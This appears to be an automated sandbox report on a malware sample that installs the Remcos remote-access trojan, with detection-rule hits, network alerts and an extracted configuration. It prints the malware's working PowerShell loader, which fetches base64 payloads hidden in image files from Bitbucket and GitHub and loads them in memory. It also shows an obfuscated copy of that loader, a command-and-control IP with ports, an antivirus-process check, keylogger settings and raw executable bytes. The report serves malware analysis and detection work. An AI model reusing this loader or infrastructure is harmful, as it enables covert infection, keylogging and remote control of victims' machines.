                      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif, ProcessId: 7500, TargetFilename: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif, ProcessId: 7500, TargetFilename: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 6706e721f2c06.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , ProcessId: 7512, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8040, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7236, ProcessName: findstr.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 62 F8 42 82 C6 29 18 0B 2F 08 E9 34 52 CF DA 48 2A A8 91 D5 33 54 D7 24 BC 7B 9A 75 60 CF E1 F3 47 06 D7 BA 86 01 E5 71 7F B0 A5 90 F6 57 A1 3A A5 1D 87 2B A4 18 E8 BF B2 51 37 BE DC CD 2E E2 87 82 71 6D EB 23 92 CB 31 44 1E 8E 0A 90 02 B8 D9 D3 FB 51 00 1D 17 46 E8 2B 9E DE 9A B7 D0 85 FF B2 14 C9 87 A9 A5 22 4B 15 21 37 72 01 A8 6A 81 EE , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-UP4CTA\exepath
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:39:58.843802+020020204231Exploit Kit Activity Detected3.5.10.196443192.168.2.949879TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:39:58.843802+020020204251Exploit Kit Activity Detected3.5.10.196443192.168.2.949879TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:40:00.300556+020020365941Malware Command and Control Activity Detected192.168.2.949888101.99.94.692404TCP
                      2024-10-10T13:40:01.601418+020020365941Malware Command and Control Activity Detected192.168.2.949898101.99.94.692404TCP
                      2024-10-10T13:40:01.601564+020020365941Malware Command and Control Activity Detected192.168.2.949899101.99.94.692404TCP
                      2024-10-10T13:40:04.288987+020020365941Malware Command and Control Activity Detected192.168.2.949913101.99.94.692404TCP
                      2024-10-10T13:40:04.398309+020020365941Malware Command and Control Activity Detected192.168.2.949914101.99.94.692404TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:39:38.330308+020020490381A Network Trojan was detected185.199.110.133443192.168.2.949736TCP
                      2024-10-10T13:39:54.705435+020020490381A Network Trojan was detected185.199.110.133443192.168.2.949845TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:40:02.199239+020028033043Unknown Traffic192.168.2.949904178.237.33.5080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-10T13:39:43.227676+020028032742Potentially Bad Traffic192.168.2.949782104.26.12.20580TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "101.99.94.69:2404:1101.99.94.69:8090:1101.99.94.69:44444:1101.99.94.69:80:1101.99.94.69:21:0101.99.94.69:4899:0", "Assigned name": "host_one", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UP4CTA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A630EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7D2A630EC
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636343214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,15_2_00007FF636343214
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,33_2_004338C8
                      Source: RegAsm.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      barindex
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407538 _wcslen,CoGetObject,33_2_00407538
                      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.171.225:443 -> 192.168.2.9:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49871 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.10.196:443 -> 192.168.2.9:49879 version: TLS 1.2
                      Source: 6706e721f2c06.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: wextract.pdb source: 6706e721f2c06.exe, MicrosoftServiceUpdater.exe.9.dr, payload[1].exe.9.dr
                      Source: Binary string: wextract.pdbGCTL source: 6706e721f2c06.exe, MicrosoftServiceUpdater.exe.9.dr, payload[1].exe.9.dr
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A6204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7D2A6204C
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004062D5 FindFirstFileW,FindClose,11_2_004062D5
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00402E18 FindFirstFileW,11_2_00402E18
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00406C9B
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636342034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_00007FF636342034
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,33_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,33_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,33_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407877 FindFirstFileW,FindNextFileW,33_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044E8F9 FindFirstFileExA,33_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,33_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,33_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,33_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10006580 FindFirstFileExA,33_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040AE51 FindFirstFileW,FindNextFileW,37_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,38_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,40_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,33_2_00407CD2
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\userJump to behavior

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49888 -> 101.99.94.69:2404
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49898 -> 101.99.94.69:2404
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49913 -> 101.99.94.69:2404
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49899 -> 101.99.94.69:2404
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49914 -> 101.99.94.69:2404
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 3.5.10.196:443 -> 192.168.2.9:49879
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 3.5.10.196:443 -> 192.168.2.9:49879
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.110.133:443 -> 192.168.2.9:49736
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.110.133:443 -> 192.168.2.9:49845
                      Source: Malware configuration extractorURLs: 101.99.94.69
                      Source: global trafficTCP traffic: 192.168.2.9:49888 -> 101.99.94.69:2404
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKserver: gunicorndate: Thu, 10 Oct 2024 11:39:44 GMTcontent-disposition: inline; filename=legit.execontent-type: application/x-msdos-programcontent-length: 1308110last-modified: Thu, 10 Oct 2024 11:37:18 GMTcache-control: no-cacheetag: "1728560238.9919808-1308110-3772517616"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 11 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 20 c7 01 00 00 00 00 00 00 00 00 00 66 cd 13 00 68 28 00 